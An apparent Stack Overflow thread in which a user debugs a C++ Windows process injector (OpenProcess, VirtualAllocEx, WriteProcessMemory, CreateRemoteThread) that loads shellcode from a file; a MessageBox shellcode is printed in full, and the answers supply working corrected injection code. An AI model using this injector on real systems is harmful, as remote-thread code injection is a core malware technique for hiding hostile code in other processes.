
I have a big problem that has had me stuck for three days now: how can I load shellcode from a binary file and inject it correctly into a target process? When I test with the shellcode embedded directly in the example program's own source code, it works fine.

Why does this not work when the shellcode comes from a file? Has anyone run into this problem before?

Here is the tested code (adapted from this to show a MessageBox):

#include <windows.h>
#include <iostream>
#include <fstream>
#include <vector>

using namespace std;

int main(int argc, char** argv) {

    int process_id = atoi(argv[1]);

    //MessageBox
    //char xcode[] = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\xc\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x1\xda\x8b\x52\x78\x1\xda\x8b\x72\x20\x1\xde\x31\xc9\x41\xad\x1\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x4\x72\x6f\x63\x41\x75\xeb\x81\x78\x8\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x1\xde\x66\x8b\xc\x4e\x49\x8b\x72\x1c\x1\xde\x8b\x14\x8e\x1\xda\x31\xc9\x53\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\xc\x59\x50\x51\x66\xb9\x6c\x6c\x51\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x4\xb9\x6f\x78\x41\x0\x51\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd2\x83\xc4\x10\x68\x61\x62\x63\x64\x83\x6c\x24\x3\x64\x89\xe6\x31\xc9\x51\x56\x56\x51\xff\xd0";

    vector<char> xcode;

    ifstream infile;
    infile.open("shellcode.bin", std::ios::in | std::ios::binary);
    infile.seekg(0, std::ios::end);
    size_t file_size_in_byte = infile.tellg();
    xcode.resize(file_size_in_byte);
    infile.seekg(0, std::ios::beg);
    infile.read(&xcode[0], file_size_in_byte);
    infile.close();

    HANDLE process_handle;
    DWORD pointer_after_allocated;
    process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);
    if (process_handle == NULL)
    {
        puts("[-]Error while open the process\n");
    }
    else {
        puts("[+] Process Opened sucessfully\n");
    }
    pointer_after_allocated = (DWORD)VirtualAllocEx(process_handle, NULL, sizeof(xcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (pointer_after_allocated == NULL) {
        puts("[-]Error while get the base address to write\n");
    }
    else {
        printf("[+]Got the address to write 0x%x\n", pointer_after_allocated);
    }
    if (WriteProcessMemory(process_handle, (LPVOID)pointer_after_allocated, &xcode[0] /*(LPCVOID) shellcode*/, sizeof(xcode), 0)) {
        puts("[+]Injected\n");
        puts("[+]Running the shellcode as new thread !\n");
        CreateRemoteThread(process_handle, NULL, 100, (LPTHREAD_START_ROUTINE)pointer_after_allocated, NULL, NULL, NULL);
    }
    else {
        puts("Not Injected\n");
    }
    return 0;
}
Coringa
  • What does "not works" mean? Also, what is the hex value of the first byte in your file? Is it 31 or is it 5C? If the latter, you put a hexadecimal representation of your shellcode in a file instead of the shellcode itself. – Botje Oct 07 '20 at 15:20
  • @Botje, [this](https://prnt.sc/uuvz4s) is the content (`xcode.data()`) of `xcode` after it is loaded from the file. – Coringa Oct 07 '20 at 16:35
  • So my guess is correct. You created a file containing the hexadecimal representation instead of actual binary. You need to rewrite the file so that the first three bytes have the hex values "31 c9 64". Check with a hex editor. – Botje Oct 07 '20 at 16:39
  • @Botje, yes, I only copied/pasted it from the source code to the .bin file. – Coringa Oct 07 '20 at 16:40
  • That is wrong. The text in your C source file is a hexadecimal representation of the actual binary bytes. The compiler interprets the representation `\x31` and generates a single byte with hex value `31`. You need to do the same transformation when creating the file. The easiest way is probably to use an `ofstream` in binary mode, and then you can throw away that code again. – Botje Oct 07 '20 at 16:46
  • @Botje, "*`You need to do the same transformation when creating the file.`*" - some suggestion to automatize this with a C++ code? if yes, could show in a answer please? – Coringa Oct 07 '20 at 16:50
  • See the end of my comment. `ofstream("shellcode.bin", std::ios::binary).write(xcode, sizeof(xcode));` (with `xcode` as currently defined in your question). – Botje Oct 07 '20 at 16:53
  • @Botje, "*`(with xcode as currently defined in your question.`*", what definition? this: `char xcode[] = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\xc\x8b\x70 ...";` or `vector xcode;`? – Coringa Oct 07 '20 at 17:16
  • @Botje, it would be better to have an answer with the complete read/write-to-file code sequence. I will accept your answer as the solution if it works. Remember that I need this to work only with shellcode coming from a file (after copy/pasting from the IDE); it is not acceptable to rely on `char xcode[] = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\xc\x8b\x70 ..."` as the basis of the fix, because if we are talking about the shellcode of a large executable file, it is not possible to paste all of it into the program's source code in the editor: that crashes the IDE. – Coringa Oct 07 '20 at 17:33
  • Normally you go the other way (binary to hex). – Botje Oct 07 '20 at 17:38
  • @Botje, [this](http://www.rohitab.com/discuss/topic/34122-c-shell-code-generator/?p=10066069) program generates shellcode from an executable file in the same format as here in my question; the difference is that here the shellcode is a MessageBox. So I am asking for help to make this format, `"\x31\xc9\x64\x8b\x41\x30\x8b\x40\xc\x8b\x70 ..."`, work for both (a .exe file and the MessageBox). As you know, the shellcode of an executable file does not fit in an IDE :D, as already explained in the previous comment; that is the reason for working with shellcode from a binary file. – Coringa Oct 07 '20 at 17:58
  • That is why I chose this MessageBox example, to make it easier to understand here on Stack Overflow. – Coringa Oct 07 '20 at 18:00
  • But... That program does the exact opposite of what you're asking! It goes from binary to C hexadecimal encoding. The input you gave to **that** program is what you should put in shellcode.bin for **this** program. – Botje Oct 07 '20 at 18:07
  • @Botje, I think the solution has been found :D. See the section **Remotely Hosted Shellcode** [here](https://blog.f-secure.com/dynamic-shellcode-execution/). The trick is that I must change the C hexadecimal encoding (`"\\x%02x"`) to `"%2hhx"` or `"0x%.2X"` before creating *shellcode.bin*. – Coringa Oct 07 '20 at 19:27
  • That site talks about using `sscanf` to reinterpret text containing hex escapes back to binary. If that floats your boat, sure. – Botje Oct 07 '20 at 22:12
  • @Botje, I am looking for a similar C++ function for this. – Coringa Oct 07 '20 at 22:17
  • You. Don't. Need. It. You need shellcode in binary format that you can read from a file. If you are copypasting from C source code you can use the ofstream code I posted above to regenerate it, but normally you simply assemble shellcode into binary yourself. – Botje Oct 07 '20 at 22:18
  • @Botje, "*`You need shellcode in binary format that you can read from a file. If you are copypasting from C source code you can use the ofstream code I posted above to regenerate it`*" - Is you reffer to [this](https://stackoverflow.com/questions/5420317/reading-and-writing-binary-file)? – Coringa Oct 07 '20 at 22:48
  • Uh, sure. Whatever gets you to actually create a binary file and to stop focusing on the hex representation. – Botje Oct 07 '20 at 22:51
  • @Botje, good suggestion :D. This really seems like a good idea. I will try it. – Coringa Oct 07 '20 at 23:00
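
Following Botje's ofstream suggestion in the comments above, here is a minimal sketch of how shellcode.bin could be regenerated from the string literal in the original source. This is only an illustration: the compiler has already turned the \x.. escapes into raw bytes, so writing that array in binary mode produces a genuine binary file (the array is abbreviated below; the full shellcode from the question would go there).

#include <fstream>

int main() {
    // The "\x31\xc9..." escapes were already converted to raw bytes by the compiler.
    // (Abbreviated here; paste the full shellcode array from the question.)
    char xcode[] =
        "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14" /* ... */;

    // Write the raw bytes in binary mode.
    // sizeof(xcode) - 1 drops the terminating NUL added by the string literal.
    std::ofstream out("shellcode.bin", std::ios::binary);
    out.write(xcode, sizeof(xcode) - 1);
    return 0;
}

Opening the resulting shellcode.bin in a hex editor should then show 31 C9 64 as the first bytes, which is the check suggested in the comments.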

1 Answer


It is because you are using sizeof(xcode). In the first case, xcode is a character array whose size is known at compile time. In your case, the second one, sizeof(xcode) returns the size of the std::vector object itself (a few pointers' worth of bytes), not the number of bytes read from the file. You should use file_size_in_byte instead. See this piece of code:

pointer_after_allocated = (DWORD)VirtualAllocEx(process_handle, NULL, sizeof(xcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
....
if (WriteProcessMemory(process_handle, (LPVOID)pointer_after_allocated, &xcode[0] /*(LPCVOID) shellcode*/, sizeof(xcode), 0))

The sizeof(xcode) is meaningless in both the VirtualAllocEx and the WriteProcessMemory call. Replace it with the size of the file:

pointer_after_allocated = (DWORD)VirtualAllocEx(process_handle, NULL, file_size_in_byte, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
....
if (WriteProcessMemory(process_handle, (LPVOID)pointer_after_allocated, &xcode[0], file_size_in_byte, 0))

As commented by Botje:
Update 1: you can pass xcode.data() and xcode.size() instead, to make it clear that the two belong together.
Update 2: a C++ escape sequence such as \x31 (four characters) is a textual hex representation of a single binary byte, meant to be read and edited by a human. The real .bin file must not be a text file containing such escape sequences; it should contain the raw bytes themselves, which can be inspected with a hex editor.
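
For completeness, a minimal sketch of the corrected read-and-inject sequence, using the vector's own size everywhere instead of sizeof(xcode). The inject() helper name and the error handling here are illustrative additions, not part of the original code:

#include <windows.h>
#include <fstream>
#include <iterator>
#include <vector>

// Illustrative helper: read shellcode.bin as raw bytes and inject it into
// the process identified by process_handle.
bool inject(HANDLE process_handle) {
    std::ifstream infile("shellcode.bin", std::ios::binary);
    std::vector<char> xcode((std::istreambuf_iterator<char>(infile)),
                            std::istreambuf_iterator<char>());
    if (xcode.empty()) return false;

    // Allocate exactly xcode.size() bytes in the target process.
    LPVOID remote = VirtualAllocEx(process_handle, NULL, xcode.size(),
                                   MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (remote == NULL) return false;

    // Copy the shellcode and run it as a new thread.
    if (!WriteProcessMemory(process_handle, remote, xcode.data(), xcode.size(), NULL))
        return false;
    return CreateRemoteThread(process_handle, NULL, 0,
                              (LPTHREAD_START_ROUTINE)remote, NULL, 0, NULL) != NULL;
}

Note that this only helps if shellcode.bin already contains raw bytes (31 C9 64 ...), not the textual \x31\xc9 representation, as discussed in the comments under the question.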

armagedescu
  • Well spotted! I would pass `xcode.data()` and `xcode.size()` instead, to signal that they're related. – Botje Oct 07 '20 at 15:41
  • @Botje Thanks, added to answer – armagedescu Oct 07 '20 at 15:43
  • Thank you for your answer, but even after all the changes the MessageBox is still not shown in the target process (notepad.exe, 32-bit) and it crashes (like before). And the content of the file is the same as the `char xcode[]` initialized in the source code itself. – Coringa Oct 07 '20 at 16:10
  • You will only understand once you run the code above. Just guessing is not the right road. – Coringa Oct 07 '20 at 16:16
  • @coringa Please answer my comment on the question itself. If the first character of your file is a backslash, your file is wrong, especially because your other question shows evidence that it is wrong. – Botje Oct 07 '20 at 16:30